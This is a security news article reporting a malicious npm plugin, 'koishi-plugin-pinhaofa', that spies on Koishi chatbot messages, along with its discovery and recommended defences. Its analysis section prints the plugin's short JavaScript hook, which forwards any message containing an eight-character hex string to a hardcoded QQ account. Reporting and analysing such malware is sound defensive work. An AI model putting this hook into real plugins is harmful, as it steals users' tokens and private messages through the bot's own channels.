Cybersecurity researchers have uncovered a sophisticated supply chain attack targeting Koishi chatbot users through a malicious npm package.

The package, identified as “koishi-plugin-pinhaofa,” appears innocuous but contains a hidden data exfiltration mechanism that monitors all messages processed by the chatbot.

When the malware detects an eight-character hexadecimal string—often representing sensitive data like Git commit hashes, truncated JWTs, or API tokens—it immediately forwards the entire message to a hardcoded QQ account, potentially exposing user credentials and confidential information.

Koishi has emerged as a popular TypeScript framework for developing cross-platform chatbots that can operate simultaneously on QQ, Telegram, Discord, and other messaging services from a single codebase.

With over one thousand community plugins available in its marketplace, Koishi has become particularly attractive for businesses developing customer engagement solutions.

eMarketer predicts that by 2026, one-third of U.S. adults will rely on banking chatbots, highlighting the growing importance of chatbot security.

Socket.dev researchers identified the malicious package during routine security scans, flagging it as “Known malware” through their AI Scanner system.

The researchers noted that the malware’s seemingly narrow targeting approach—focusing only on messages containing eight-character hex strings—is particularly insidious, as it generates few false positives while maximizing the collection of high-value data.

The impact extends across multiple industries utilizing chatbots. Banking assistants might inadvertently disclose payment card numbers, e-commerce chatbots could leak order-status links containing authentication tokens, and healthcare bots might expose patient information.

Because Koishi plugins execute directly within the bot’s trusted environment, administrators who install plugins without thorough code reviews essentially grant the malicious code unrestricted access to read and modify every message passing through the system.

Infection Mechanism Analysis

What makes this attack particularly concerning is its elegant simplicity.

Rather than employing complex obfuscation techniques, the malware operates through just a few lines of straightforward JavaScript code that hooks into Koishi’s message handling system:-

ctx.on("message", (session) => { // process every incoming message
    const hexRegex = /(^|[^0-9A-Fa-f])([0-9A-Fa-f]{8})([^0-9A-Fa-f]|$)/;
    const content = session.content.replace(" ", "");
    if (hexRegex.test(content)) { // true if an exact 8-char hex string exists...         
        session.bot.sendPrivateMessage( // exfiltrate complete message text
            "1821181277", // threat actor's QQ UIN
            content);
        session.bot.sendPrivateMessage(
            extractAll8DigitHex(content)[0]);
    }
});

The malware’s exfiltration method is particularly effective at evading detection because it utilizes the same communication channels that legitimate chatbot traffic would use.

Since the stolen data exits via the chat protocol the bot normally employs, standard web filters and endpoint defenses may not differentiate between legitimate and malicious communications.

The package was published by a threat actor using the npm alias “kuminfennel” with a registration email matching the hardcoded QQ account ([email protected]).

Security experts recommend that organizations running Koishi chatbots immediately review their installed plugins and implement container-based isolation for bots to prevent unauthorized data transmission.

Additionally, implementing automated supply chain security tools like Socket’s GitHub application can help catch suspicious patterns during package installation, reducing the risk of malicious code entering production environments.

Equip your SOC team with deep threat analysis for faster response -> Get Extra 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 for Free